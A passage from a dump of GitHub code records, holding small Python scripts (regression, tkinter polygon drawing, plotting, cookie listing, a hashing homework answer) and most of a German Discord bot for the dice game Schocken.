更新梯度\n\n\n# 测试过程\n\nprint('w = ',model.linear.weight.item())\nprint('b = ',model.linear.bias.item())\n\n\nx_test = torch.tensor([[6.0],[4.0]])\ny_test = model(x_test)\nprint('最后的预测值是: ',y_test)\n\n\n\n\n\n\n\n","repo_name":"Rookie1019/data_share","sub_path":"Python总文件夹/刘二大人/LR_model.py","file_name":"LR_model.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"11062253397","text":"import h5py\n\nfname = \"resnet50_weights_tf_dim_ordering_tf_kernels.h5\"\ndfname = \"resnet50_owl.hdf5\"\n\nf = h5py.File(fname, 'r')\ndata_file = h5py.File(dfname, 'w')\n\nfor node_name in f.keys():\n for param in f[node_name].keys():\n conv_weight = f[node_name][param].value.tolist()\n data_file.create_dataset(param, data=conv_weight)\n\nf.close()\ndata_file.close()\n\n","repo_name":"pvdhove/owl-resnet","sub_path":"weights/save_weights.py","file_name":"save_weights.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"11543348972","text":"import tkinter\r\nfrom math import *\r\nfrom random import *\r\n\r\nSCREEN_SIZE = (600, 600)\r\n\r\n\r\ndef xs(x):\r\n return SCREEN_SIZE[0] // 2 + x\r\ndef oxs(x):\r\n return -SCREEN_SIZE[0] // 2 + x\r\n\r\ndef ys(y):\r\n return SCREEN_SIZE[1] // 2 - y\r\ndef oys(y):\r\n return -y+SCREEN_SIZE[1] // 2\r\n\r\n\r\nmain = tkinter.Tk()\r\ncanvas = tkinter.Canvas(main, bg='white', height=SCREEN_SIZE[1], width=SCREEN_SIZE[0])\r\n\r\n\r\nclass Vektor:\r\n def __init__(self, x=None, y=None, l=None, a=None):\r\n if x is not None and y is not None:\r\n self.x = x\r\n self.y = y\r\n elif l is not None and a is not None:\r\n self.x = l\r\n self.y = 0\r\n if a != 0:\r\n v1 = self.rotate(a)\r\n self.x = v1.x\r\n self.y = v1.y\r\n\r\n def rotate(self, a):\r\n a = a / 180 * pi\r\n x = self.x * cos(a) - self.y * sin(a)\r\n y = self.x * sin(a) + self.y * cos(a)\r\n return Vektor(x, y)\r\n\r\n def __add__(self, other):\r\n if isinstance(other, Vektor):\r\n return Vektor(x=(self.x + other.x), y=(self.y + other.y))\r\n\r\n def __neg__(self):\r\n return Vektor(x=-self.x, y=-self.y)\r\n\r\n def __sub__(self, other):\r\n return self + (-other)\r\n\r\n\r\nclass nugolnik:\r\n def __init__(self):\r\n self.ss = []\r\n self.ox = 0\r\n self.oy = 0\r\n self.alpha = 0\r\n self.item = None\r\n\r\n def rotate(self, alpha):\r\n # alpha\r\n ss1 = [0] * len(self.ss)\r\n ov = Vektor(x=self.ox, y=self.oy)\r\n for i in range(0, len(self.ss), 2):\r\n v = Vektor(x=self.ss[i], y=self.ss[i + 1])\r\n v = v - ov\r\n v = v.rotate(alpha)\r\n v = v + ov\r\n ss1[i] = v.x\r\n ss1[i + 1] = v.y\r\n return ss1\r\n\r\n def scale(self, k):\r\n ss1 = [0] * len(self.ss)\r\n ov = Vektor(x=self.ox, y=self.oy)\r\n for i in range(0, len(self.ss), 2):\r\n v = Vektor(x=self.ss[i], y=self.ss[i + 1])\r\n v = v - ov\r\n v.x *= k\r\n v.y *= k\r\n v = v + ov\r\n ss1[i] = v.x\r\n ss1[i + 1] = v.y\r\n return ss1\r\n\r\n def draw(self):\r\n ss1 = [0] * len(self.ss)\r\n for i in range(0, len(self.ss), 2):\r\n ss1[i]=xs(self.ss[i])\r\n ss1[i+1]=ys(self.ss[i+1])\r\n if len(self.ss)>0:\r\n if self.item is None:\r\n self.item = canvas.create_polygon(ss1, outline='red', fill='white')\r\n else:\r\n canvas.coords(self.item,ss1)\r\n return self.item\r\n\r\n def change_rotation_point(self,x,y):\r\n self.ox=oxs(x)\r\n self.oy=oys(y)\r\n\r\n def add_point(self,x,y):\r\n self.ss.append(oxs(x))\r\n self.ss.append(oys(y))\r\n self.draw()\r\n\r\npoly = 
nugolnik()\r\n\r\ndef rotPoint(event):\r\n print(event)\r\n canvas.create_oval(event.x - 2, event.y - 2, event.x + 2, event.y + 2, fill=\"red\")\r\n poly.change_rotation_point(event.x,event.y)\r\n\r\ndef addPoint(event):\r\n poly.add_point(event.x,event.y)\r\n\r\ncanvas.bind('', rotPoint)\r\ncanvas.bind('', addPoint)\r\ndef leftKey(event):\r\n poly.ss = poly.rotate(-0.5)\r\n poly.draw()\r\n\r\ndef rightKey(event):\r\n poly.ss = poly.rotate(0.5)\r\n poly.draw()\r\ndef upKey(event):\r\n poly.ss = poly.scale(1.25)\r\n poly.draw()\r\ndef downKey(event):\r\n poly.ss = poly.scale(0.8)\r\n poly.draw()\r\n\r\ndef rotate(alpha, s):\r\n poly.draw()\r\n\r\nmain.bind('',leftKey)\r\nmain.bind('',rightKey)\r\nmain.bind('',upKey)\r\nmain.bind('',downKey)\r\n\r\n\r\ncanvas.pack()\r\nmain.mainloop()\r\n","repo_name":"jshhh/projects","sub_path":"task1.2.py","file_name":"task1.2.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"40589436424","text":"import matplotlib.pyplot as plt\n\n\ndef text(x, y, text):\n plt.text(x, y, text,\n fontsize=15,\n color=\"#f8f9fa\")\n\n\nimg = plt.imread(\"../Graphics/problema_10.png\")\nplt.imshow(img)\nplt.fill_between([0, 543], [454, 454],\n color=\"grey\",\n alpha=0.3)\ntext(300, 445, \"A\")\ntext(285, 385, \"B\")\ntext(365, 388, \"C\")\ntext(291, 318, \"D\")\ntext(259, 245, \"F\")\ntext(441, 266, \"E\")\ntext(91, 146, \"H\")\ntext(136, 46, \"J\")\ntext(285, 180, \"I\")\ntext(420, 223, \"G\")\nplt.axis(\"off\")\nplt.tight_layout()\nplt.savefig(\"../Graphics/map.png\", dpi=500)\n","repo_name":"giovannilopez9808/CIMAT_primer_semestre","sub_path":"Analisis_de_datos/Tarea_06/Team_Document/Scripts/Graphics_problem_10.py","file_name":"Graphics_problem_10.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"31598603693","text":"lar = float(input('Digite a largura da parede: '))\nalt = float(input('Digite a altura da parede: '))\nar = lar * alt\nlt = ar / 2\nprint('A area total da parede é {} m², e será necessario {} Lt de tinta'.format(ar, lt))\n\n\n\n# Largura em Metros\n# Altura em Metros\n# Area é = largura * altura\n# Cada Lt de tinta, pinta 2 m²\n# indica quant necessaria de tinta area / 2","repo_name":"vinicciusnev/Python-Curso-em-video","sub_path":"Aula15.py","file_name":"Aula15.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"29359450386","text":"#11\n#extracting cookies\nimport urllib\nimport http.cookiejar\n\n\nurl=\"http://www.youtube.com\"\ndef extract_cookies():\n cookie_jar=http.cookiejar.CookieJar()\n url_opener=urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie_jar))\n url_opener.open(url)\n for cookie in cookie_jar:\n print(\"[cookie name=%s] --[Cookie value=%s]\" %(cookie.name,cookie.value))\n \n \nif __name__==\"__main__\":\n extract_cookies()\n","repo_name":"Prajwalnazre/APS-2020","sub_path":"cookie.py","file_name":"cookie.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"18790948893","text":"import sys\ninputStringFile = sys.argv[1]\noutputFile = sys.argv[2]\n\nwith open(inputStringFile) as f:\n inputString = f.read().strip()\nf.close()\n\ndef WHA(inStr):\n mask = 0x3FFFFFFF\n outHash = 0\n\n for byte in inStr:\n byte = 
ord(byte)\n intermediate_value = ((byte ^ 0xCC) << 24) | ((byte ^ 0x33) << 16) | ((byte ^ 0xAA) << 8) | (byte ^ 0x55)\n outHash = (outHash & mask) + (intermediate_value & mask)\n\n outHash = hex(outHash)[2:]\n return outHash\n\n#print(WHA(inputString))\n#print(WHA(\"OBVE A TEA CAKE REMEMBER THIS FRENCH NAME OF A GROUP OF ISLANDS IN THE GULF OF ST LAWRENCE\"))\n\nanswer = \"OBVE A TEA CAKE REMEMBER THIS FRENCH NAME OF A GROUP OF ISLANDS IN THE GULF OF ST LAWRENCE\"\n\nf = open(outputFile, 'w')\nf.write(answer)\nf.close()","repo_name":"shozabhussain/CS473","sub_path":"Assignment 1 - Cryptography/Submission/sol_3.1.6.py","file_name":"sol_3.1.6.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74001878679","text":"import pandas as pd\nfrom other_codes.not_used.visuals_functions import plot_prediction\n\npd.pandas.set_option(\"display.max_columns\", None)\npd.set_option(\"expand_frame_repr\", False)\npd.set_option(\"precision\", 2)\n\nsource_root = \"outputs\"\ntest_file_name = \"test_results_extrw90_patsize30.csv\"\n\nsell_trash = 1.6\nhold_trash_per = [0.5, 1.6]\nbuy_trash = 0.5\n\ntry:\n\n df = pd.read_csv(f\"{source_root}/{test_file_name}\")\n plot_prediction(df, sell_trash, hold_trash_per, buy_trash, test_file_name)\n\n\nexcept FileNotFoundError:\n print(\"Файл для анализа предсказаний с учетом профита отсутсвует\")\n","repo_name":"ma2sevich222/siamese_networks_for_stock_data_paterns_recognition","sub_path":"other_codes/not_used/pred_analysis.py","file_name":"pred_analysis.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"32822658601","text":"import os\nimport signal\n\nfrom .exceptions import (\n SpielLaeuft,\n SpielLaeuftNicht,\n FalscherSpielBefehl,\n FalscheAktion,\n PermissionError,\n FalscherSpieler,\n ZuOftGeworfen,\n NochNichtGeworfen,\n LustWurf,\n SpielerMussWuerfeln,\n)\nfrom .spiel import SchockenSpiel\nfrom . 
import wurf\nfrom discord.utils import get\nfrom copy import deepcopy\nimport random\n\n\nclass SchockenBot:\n def __init__(self, client):\n self.client = client\n # bot will never run on any other server than Café A\n self.guild = client.guilds[0]\n self.schock_channel_name = \"schocktresen\"\n self.valid_guild_name = \"Café A\"\n self.game_running = False\n self._all_member_names = [member.name for member in self.guild.members]\n self._start_game_cmd = \"schocken\"\n self._end_game_cmd = \"beenden\"\n self._restart_cmd = \"neustart\"\n self._wuerfel_emoji_names = dict(\n [\n (1, \"wuerfel_1\"),\n (2, \"wuerfel_2\"),\n (3, \"wuerfel_3\"),\n (4, \"wuerfel_4\"),\n (5, \"wuerfel_5\"),\n (6, \"wuerfel_6\"),\n ]\n )\n self.discord_to_game_cmd_dict = {\n \"einwerfen\": \"einwerfen\",\n \"wuerfeln\": \"wuerfeln\",\n \"würfeln\": \"wuerfeln\",\n \"stechen\": \"stechen\",\n \"weiter\": \"weiter\",\n \"beiseite\": \"beiseite\",\n }\n\n self.game_to_discord_cmd_dict = {\n v: k for k, v in self.discord_to_game_cmd_dict.items()\n }\n\n self._halbzeit_state_names = {\n 1: \"halbzeit_erste\",\n 2: \"halbzeit_zweite\",\n 3: \"finale\",\n }\n\n self._lustwuerfe_runde = dict()\n\n def emoji_by_name(self, name):\n emoji = get(self.guild.emojis, name=name)\n return str(emoji)\n\n def name_to_member(self, name):\n member = get(self.guild.members, name=name)\n return member\n\n def wurf_to_emoji(self, wuerfe, einsen=0):\n if einsen > 0:\n out = \"\"\n rest = [self._wuerfel_emoji_names[w] for w in wuerfe[: 3 - einsen]]\n out += \" \".join([self.emoji_by_name(r) for r in rest])\n out += \" **|**\"\n for _ in range(einsen):\n out += f\" {self.emoji_by_name(self._wuerfel_emoji_names[1])}\"\n else:\n emoji_names = [self._wuerfel_emoji_names[w] for w in wuerfe]\n out = \" \".join([self.emoji_by_name(n) for n in emoji_names])\n return out\n\n def discord_to_game_cmd(self, discord_cmd):\n try:\n game_cmd = self.discord_to_game_cmd_dict[discord_cmd]\n return game_cmd\n except KeyError:\n raise FalscherSpielBefehl\n\n def spieler_by_name(self, name, spielerliste):\n spieler = next(sp for sp in spielerliste if sp.name == name)\n return spieler\n\n def replace_names_by_mentions(self, string):\n for name in self._all_member_names:\n member = self.name_to_member(name)\n string = string.replace(name, member.mention)\n return string\n\n def mention_mit_deckel(self, spieler):\n name = spieler.name\n deckel = spieler.deckel\n deckel_emoji = self.emoji_by_name(\"kronkorken\")\n out = f\"{self.name_to_member(name).mention} ({deckel} {deckel_emoji})\"\n return out\n\n def command_in_schock_channel(self, message):\n msg_text = message.content\n channel = message.channel\n correct_channel = channel.name == self.schock_channel_name\n is_command = msg_text.startswith(\"!\")\n is_not_restart = self._restart_cmd not in msg_text\n return correct_channel and is_command and is_not_restart\n\n def restart_issued(self, message):\n msg_text = message.content\n return msg_text == f\"!{self._restart_cmd}\"\n\n async def parse_input(self, message):\n # all messages from channels with read permissions are read\n msg_text = message.content\n channel = message.channel\n try:\n if self.command_in_schock_channel(message):\n command = msg_text.split(\"!\")[-1]\n if command == self._start_game_cmd:\n # TODO Status auf Spiel läuft setzten\n if self.game_running:\n raise SpielLaeuft\n else:\n self.game_running = True\n self.game = SchockenSpiel()\n msg = f\"{message.author.mention} will schocken. 
\"\n msg += \"`!einwerfen` zum mitmachen\"\n await self.print_to_channel(channel, msg)\n\n elif command == self._end_game_cmd:\n # TODO Status auf Spiel beendet setzten\n if self.game_running:\n msg = f\"{message.author.mention} hat das Spiel beendet\"\n self.game_running = False\n await self.print_to_channel(channel, msg)\n else:\n raise SpielLaeuftNicht\n\n elif command == \"ICH WILL UNREAL TOURNAMENT SPIELEN\":\n msg = \"Dann geh doch\"\n await self.print_to_channel(channel, msg)\n link = \"https://tenor.com/view/unreal-tournament\"\n link += \"-kid-unreal-unreal-kid-rage-gif-16110833\"\n await self.print_to_channel(channel, link)\n\n else:\n if not self.game_running:\n raise SpielLaeuftNicht\n # actual game\n await self.handle_game(message)\n\n elif self.restart_issued(message):\n role_strs = [str(role) for role in message.author.roles]\n if \"developer\" not in role_strs:\n raise PermissionError\n msg = f\"👋 Bis gleich! :wave:\"\n await self.print_to_channel(channel, msg)\n await self.client.logout()\n os.kill(os.getpid(), signal.SIGINT)\n\n except NotImplementedError:\n msg = \"Das geht leider noch nicht. (Nicht implementiert)\"\n msg += \"\\n Spiel wird beendet.\"\n await self.print_to_channel(channel, msg)\n self.game_running = False\n del self.game\n\n except PermissionError:\n msg = \"Das darfst du nicht, DU HURENSOHN!\"\n msg += f\"{self.emoji_by_name('king')}\"\n await self.print_to_channel(channel, msg)\n\n except SpielLaeuftNicht:\n msg = f\"Gerade läuft kein Spiel. \"\n msg += f\"`!{self._start_game_cmd}` zum starten\"\n await self.print_to_channel(channel, msg)\n\n except SpielLaeuft:\n msg = f\"Es läuft bereits ein Spiel. \"\n msg += \"Versuch's mal mit `!einwerfen`.\"\n await self.print_to_channel(channel, msg)\n\n except FalscherSpielBefehl:\n msg = \"Diesen Befehl gibt es nicht. \"\n await self.print_to_channel(channel, msg)\n\n except FalscherSpieler as e:\n if str(e):\n msg = self.replace_names_by_mentions(str(e))\n else:\n msg = \"Das darfst du gerade nicht (Falsche Spielerin).\"\n await self.print_to_channel(channel, msg)\n\n except ZuOftGeworfen as e:\n if str(e):\n msg = self.replace_names_by_mentions(str(e))\n else:\n msg = \"Du darfst nicht nochmal!\"\n await self.print_to_channel(channel, msg)\n\n except FalscheAktion as e:\n if str(e):\n msg = self.replace_names_by_mentions(str(e))\n else:\n msg = \"Das darfst du gerade nicht. (Falsche Aktion)\"\n await self.print_to_channel(channel, msg)\n\n except NochNichtGeworfen as e:\n if str(e):\n msg = self.replace_names_by_mentions(str(e))\n else:\n msg = \"Es muss erst gewuerfelt werden!\"\n await self.print_to_channel(channel, msg)\n\n except NochNichtGeworfen as e:\n if str(e):\n msg = self.replace_names_by_mentions(str(e))\n else:\n msg = \"Es muss erst gewuerfelt werden!\"\n await self.print_to_channel(channel, msg)\n\n except SpielerMussWuerfeln as e:\n if str(e):\n msg = self.replace_names_by_mentions(str(e))\n else:\n msg = \"Es muss erst gewuerfelt werden!\"\n await self.print_to_channel(channel, msg)\n\n async def print_to_channel(self, channel, text):\n return await channel.send(text)\n\n async def handle_game(self, message):\n msg_text = message.content\n msg_channel = message.channel\n msg_author = message.author\n command = msg_text.split(\"!\")[-1]\n msg_author_name = msg_author.name\n\n # freeze old game state. 
some properties are needed for the bot\n self.game_old = deepcopy(self.game)\n\n # run game state machine\n game_cmd = self.discord_to_game_cmd(command)\n is_lustwurf = False\n try:\n self.game.command_to_event(msg_author_name, game_cmd)\n except LustWurf:\n is_lustwurf = True\n\n leaf_state_str = self.game.state.leaf_state.name\n\n if leaf_state_str == \"einwerfen\":\n spieler = self.spieler_by_name(\n msg_author_name, self.game.einwerfen.spieler_liste\n )\n if command == \"einwerfen\":\n # wurf darstellen nach !einwerfen\n wurf_emoji = self.wurf_to_emoji(spieler.augen)\n out_str = f\"{message.author.mention} hat eine \"\n out_str += f\"{wurf_emoji} geworfen.\"\n await self.print_to_channel(msg_channel, out_str)\n\n if self.game.einwerfen.stecher_count > 1:\n # bei keinem weiteren einwerfen muss gestochen werden\n stecher_wurf = self.game.einwerfen.stecher_liste[0].augen\n wurf_emoji = self.wurf_to_emoji(stecher_wurf)\n\n out_str = \", \".join(\n [\n self.name_to_member(pl.name).mention\n for pl in self.game.einwerfen.stecher_liste\n ]\n )\n out_str += f\" haben eine {wurf_emoji} geworfen.\\n\"\n out_str += \"`!stechen` um zu stechen oder auf\"\n out_str += \"weiteres `!einwerfen` warten\"\n await self.print_to_channel(msg_channel, out_str)\n\n else:\n # es muss momentan nicht gestochen werden,\n # spiel kann anfangen\n if len(self.game.einwerfen.spieler_liste) > 1:\n # spiel faengt erst an, wenn mehr als ein spieler\n # eingeworfen hat\n anfaenger = self.game.einwerfen.stecher_liste[0]\n anf_member = self.name_to_member(anfaenger.name)\n anf_wurf = anfaenger.augen\n wurf_emoji = self.wurf_to_emoji(anf_wurf)\n\n out_str = f\"{anf_member.mention} hat mit einer \"\n out_str += f\"{wurf_emoji} den niedgristen Wurf. \"\n out_str += \"\\n`!wuerfeln` um das Spiel zu beginnen \"\n out_str += \"oder auf weiteres `!einwerfen` warten.\"\n await self.print_to_channel(msg_channel, out_str)\n else:\n pass\n\n elif leaf_state_str == \"stechen\":\n spieler = self.spieler_by_name(\n msg_author_name, self.game.einwerfen.spieler_liste\n )\n if command == \"stechen\":\n # wurf darstellen\n out_str = f\"{message.author.mention} sticht mit einer \"\n out_str += f\"{self.wurf_to_emoji(spieler.augen)}.\"\n await self.print_to_channel(msg_channel, out_str)\n\n stecher = self.game.einwerfen.stecher_liste\n gestochen = self.game.einwerfen.gestochen_liste\n noch_stechen = [s for s in stecher if s not in gestochen]\n\n if len(stecher) > 1:\n noch_st_members = [\n self.name_to_member(pl.name) for pl in noch_stechen\n ]\n noch_st_mentions = [m.mention for m in noch_st_members]\n out_str = \", \".join(noch_st_mentions)\n muss = \"muss\" if len(noch_stechen) == 1 else \"müssen\"\n out_str += f\" {muss} `!stechen`.\"\n\n else:\n anfaenger = self.game.einwerfen.stecher_liste[0]\n anf_wurf = anfaenger.augen\n wurf_emoji = self.wurf_to_emoji(anf_wurf)\n out_str = f\"{self.name_to_member(anfaenger.name).mention} \"\n out_str += f\"hat mit einer {wurf_emoji} den niedrigsten Wurf. 
\"\n out_str += \"`!wuerfeln` um das Spiel zu beginnen.\"\n\n await self.print_to_channel(msg_channel, out_str)\n\n elif leaf_state_str == \"wuerfeln\":\n outputs = []\n # Vorbereitungen\n # in welcher halbzeit sind wir gerade?\n stack_list = list(self.game.state_stack.deque)\n stack_names = [st.name for st in stack_list]\n num_halbzeit = stack_names.count(\"Halbzeit\") + 1\n # in welcher halbzeit waren wir\n stack_list_old = list(self.game_old.state_stack.deque)\n stack_names_old = [st.name for st in stack_list_old]\n num_halbzeit_old = stack_names_old.count(\"Halbzeit\") + 1\n # entsprechend halbzeit_erste oder halbzeit_zweite oder finale aus\n # game holen\n halbzeit = getattr(self.game, self._halbzeit_state_names[num_halbzeit])\n spieler = self.spieler_by_name(msg_author_name, halbzeit.initiale_spieler)\n # Alle spezialfälle abfragen\n # kommen wir aus einwerfen?\n is_aus_einwerfen = str(self.game_old.state).split()[1] == \"Einwerfen\"\n is_neue_halbzeit = num_halbzeit != num_halbzeit_old\n # zug vorbei\n max_wuerfe = halbzeit.rdm.num_maximale_wuerfe\n is_zug_vorbei = max_wuerfe == 1 or spieler != halbzeit.aktiver_spieler\n # halbzeit vorbei > runde vorbei > zug vorbei\n if not is_aus_einwerfen:\n halbzeit_old = getattr(\n self.game_old, self._halbzeit_state_names[num_halbzeit_old]\n )\n spieler_old = self.spieler_by_name(\n msg_author_name, halbzeit_old.spieler_liste\n )\n\n if is_lustwurf:\n try:\n old_lustwuerfe = self._lustwuerfe_runde[spieler.name]\n except KeyError:\n old_lustwuerfe = 0\n self._lustwuerfe_runde.update({spieler.name: old_lustwuerfe + 1})\n if halbzeit.rdm.zahl_deckel_im_topf == 0:\n if halbzeit_old.rdm.zahl_deckel_im_topf == 1 and is_lustwurf:\n is_verteilen_vorbei = False\n else:\n is_verteilen_vorbei = True\n else:\n is_verteilen_vorbei = False\n alle_lustwuerfe = sum([w for w in self._lustwuerfe_runde.values()])\n # deckel aus mitte verteilt\n if spieler == halbzeit_old.spieler_liste[-1]:\n if is_verteilen_vorbei:\n spieler_tief = halbzeit.spieler_liste[0]\n spieler_tief_old = next(\n sp\n for sp in halbzeit_old.spieler_liste\n if sp.name == spieler_tief.name\n )\n deckel_vorher = spieler_tief_old.deckel\n deckel_neu = spieler_tief.deckel\n try:\n is_runde_vorbei = (\n deckel_vorher - deckel_neu\n ) != alle_lustwuerfe\n except KeyError:\n is_runde_vorbei = deckel_vorher != deckel_neu\n else:\n deckel_vorher = halbzeit_old.rdm.zahl_deckel_im_topf\n deckel_neu = halbzeit.rdm.zahl_deckel_im_topf\n # deckel wurden verteilt, also ist runde vorbei\n alle_lustwuerfe = sum(\n [w for w in self._lustwuerfe_runde.values()]\n )\n is_runde_vorbei = deckel_vorher - deckel_neu != alle_lustwuerfe\n else:\n is_runde_vorbei = False\n else:\n is_runde_vorbei = False\n # erster zug einer runde\n if is_runde_vorbei:\n is_vorlegen = False\n else:\n is_vorlegen = spieler == halbzeit.spieler_liste[0]\n\n if is_vorlegen or is_neue_halbzeit:\n self._lustwuerfe_runde = dict()\n\n if command in [\"wuerfeln\", \"würfeln\"]:\n if is_lustwurf and not is_neue_halbzeit:\n mem = self.name_to_member(spieler.name)\n abgeber = None\n for s in halbzeit_old.spieler_liste:\n sp_neu = self.spieler_by_name(s.name, halbzeit.spieler_liste)\n if s.deckel > sp_neu.deckel:\n abgeber = s\n\n out_str = f\"Das war ein Lustwurf, {mem.mention}. 
\"\n out_str += \"Hier hast du einen \"\n out_str += f\"{self.emoji_by_name('kronkorken')} \"\n if abgeber is None:\n out_str += \"aus der Mitte.\"\n else:\n abg_mem = self.name_to_member(abgeber.name)\n out_str += f\" von {abg_mem.mention}.\"\n outputs.append(out_str)\n # ggf output vor eigentlichem wurf\n if is_aus_einwerfen:\n # erster output fuer erste halbzeit\n num_halbzeit = 1\n sp_liste = halbzeit.spieler_liste\n outputs.append(\n self.gen_enter_halbzeit_output(sp_liste, num_halbzeit)\n )\n outputs.append(\n self.gen_wuerfel_output(\n spieler, halbzeit, reicht_comment=False, einsen=0,\n )\n )\n\n elif is_neue_halbzeit:\n # erster zug der neuen halbzeit\n spieler_old = self.spieler_by_name(\n spieler.name, halbzeit_old.spieler_liste\n )\n einsen = spieler_old.einsen\n outputs.append(\n self.gen_wuerfel_output(\n spieler, halbzeit_old, reicht_comment=False, einsen=einsen,\n )\n )\n outputs.append(self.gen_halbzeit_vorbei_output(halbzeit))\n sp_liste = halbzeit.spieler_liste\n outputs.append(\n self.gen_enter_halbzeit_output(sp_liste, num_halbzeit)\n )\n\n elif is_vorlegen:\n if is_zug_vorbei:\n spieler_old = self.spieler_by_name(\n spieler.name, halbzeit_old.spieler_liste\n )\n einsen = spieler_old.einsen\n outputs.append(\n self.gen_wuerfel_output(\n spieler, halbzeit, reicht_comment=False, einsen=einsen\n )\n )\n outputs.append(self.gen_nach_zug_output(halbzeit, num_halbzeit))\n else:\n einsen = spieler.einsen\n outputs.append(\n self.gen_wuerfel_output(\n spieler, halbzeit, reicht_comment=False, einsen=einsen\n )\n )\n\n elif is_runde_vorbei:\n spieler_old = self.spieler_by_name(\n spieler.name, halbzeit_old.spieler_liste\n )\n einsen = spieler_old.einsen\n outputs.append(\n self.gen_wuerfel_output(\n spieler, halbzeit_old, reicht_comment=True, einsen=einsen\n )\n )\n outputs.append(self.gen_runde_vorbei_output(halbzeit, num_halbzeit))\n\n elif is_zug_vorbei:\n einsen = spieler.einsen\n outputs.append(\n self.gen_wuerfel_output(\n spieler, halbzeit, reicht_comment=True, einsen=einsen\n )\n )\n outputs.append(self.gen_nach_zug_output(halbzeit, num_halbzeit))\n\n else:\n einsen = spieler.einsen\n outputs.append(\n self.gen_wuerfel_output(\n spieler, halbzeit, reicht_comment=True, einsen=einsen\n )\n )\n\n elif command == \"weiter\":\n if is_neue_halbzeit:\n outputs.append(self.gen_halbzeit_vorbei_output(halbzeit))\n sp_liste = halbzeit.spieler_liste\n outputs.append(\n self.gen_enter_halbzeit_output(sp_liste, num_halbzeit)\n )\n elif is_runde_vorbei:\n outputs.append(self.gen_runde_vorbei_output(halbzeit, num_halbzeit))\n else:\n outputs.append(self.gen_nach_zug_output(halbzeit, num_halbzeit))\n\n elif command == \"beiseite\":\n halbzeit_attr_name_alt = self._halbzeit_state_names[num_halbzeit]\n halbzeit_alt = getattr(self.game_old, halbzeit_attr_name_alt)\n\n spieler_liste_alt = halbzeit_alt.initiale_spieler\n spieler_alt = self.spieler_by_name(msg_author_name, spieler_liste_alt)\n\n augen_alt = spieler_alt.augen\n num_einsen_neu = spieler.einsen\n\n beiseite = self.gen_beiseite_output(spieler, augen_alt, num_einsen_neu)\n outputs.append(beiseite)\n\n for out_str in outputs:\n await self.print_to_channel(msg_channel, out_str)\n\n elif leaf_state_str == \"anstoßen!\":\n outputs = []\n stack_list = list(self.game.state_stack.deque)\n stack_list_old = list(self.game_old.state_stack.deque)\n finale = stack_list[-1]\n finale_old = stack_list_old[-1]\n fin_namen_liste = [s.name for s in finale.spieler_liste]\n gab_es_finale = len(fin_namen_liste) == len(set(fin_namen_liste))\n if 
gab_es_finale:\n letzte_halbzeit = finale\n letzte_halbzeit_old = finale_old\n else:\n letzte_halbzeit = stack_list[-2]\n letzte_halbzeit_old = stack_list_old[-2]\n\n hoch, tief = letzte_halbzeit.rdm.hoch_und_tief()\n spieler_liste = [hoch.spieler, tief.spieler]\n\n spieler = self.spieler_by_name(msg_author_name, spieler_liste)\n if command == \"wuerfeln\":\n # einsen = spieler_old.einsen\n einsen = 0\n outputs.append(\n self.gen_wuerfel_output(\n spieler,\n letzte_halbzeit_old,\n reicht_comment=False,\n einsen=einsen,\n )\n )\n\n verl_member = self.name_to_member(tief.spieler.name)\n outputs.append(f\"**{verl_member.mention} verliert damit das Spiel!**\")\n for out_str in outputs:\n await self.print_to_channel(msg_channel, out_str)\n self.game_running = False\n\n def gen_beiseite_output(self, spieler, augen_vorher, num_einsen_nachher):\n w1 = self.emoji_by_name(\"wuerfel_1\")\n w6 = self.emoji_by_name(\"wuerfel_6\")\n\n if augen_vorher.count(6) >= 2:\n sechsen_emoji = \" \".join([w6] * 2)\n umdrehen_out = f\"dreht {sechsen_emoji} zu {w1} um und \"\n else:\n umdrehen_out = \"\"\n\n einsen_emoji = [w1] * num_einsen_nachher\n einsen_emoji = \" \".join(einsen_emoji)\n beiseite_out = f\"legt {einsen_emoji} beiseite. \"\n\n mention = self.mention_mit_deckel(spieler)\n out_str = f\"{mention} {umdrehen_out}{beiseite_out}\"\n\n return out_str\n\n def gen_halbzeit_vorbei_output(self, halbzeit):\n verlierer = halbzeit.spieler_liste[0]\n verl_member = self.name_to_member(verlierer.name)\n out_str = f\"{verl_member.mention} verliert die Halbzeit. \"\n return out_str\n\n def gen_info_header(self, halbzeit, num_halbzeit, neue_runde=False):\n out_str = \"**| \"\n if num_halbzeit < 3:\n halbzeit_str = f\"Halbzeit {num_halbzeit}\"\n else:\n halbzeit_str = f\"Finale \"\n out_str += halbzeit_str\n out_str += \" | \"\n\n deckel_noch = halbzeit.rdm._zahl_deckel_im_topf\n deckel_emoji = self.emoji_by_name(\"kronkorken\")\n if not neue_runde:\n hoch, tief = halbzeit.rdm.hoch_und_tief()\n um_wieviele_gehts = hoch.wurf.deckel_wert\n out_str += f\"Es geht um {um_wieviele_gehts} {deckel_emoji}\"\n out_str += \" | \"\n wuerfe = halbzeit.rdm.num_maximale_wuerfe\n wurf_str = {1: \"Ein Wurf\", 2: \"Zwei Würfe\", 3: \"Drei Würfe\"}\n out_str += f\"{wurf_str[wuerfe]}\"\n\n if deckel_noch > 0:\n out_str += \" | \"\n out_str += f\"Mitte: {deckel_noch} {deckel_emoji}\"\n out_str += \" |**\\n\"\n\n else:\n noch_drin = \", \".join(\n [self.mention_mit_deckel(s) for s in halbzeit.spieler_liste]\n )\n out_str += \" |**\"\n out_str += \"\\n\"\n out_str += f\"Noch im Spiel: \" + noch_drin + \"\\n\"\n return out_str\n\n def gen_nach_zug_output(self, halbzeit, num_halbzeit):\n hoch, tief = 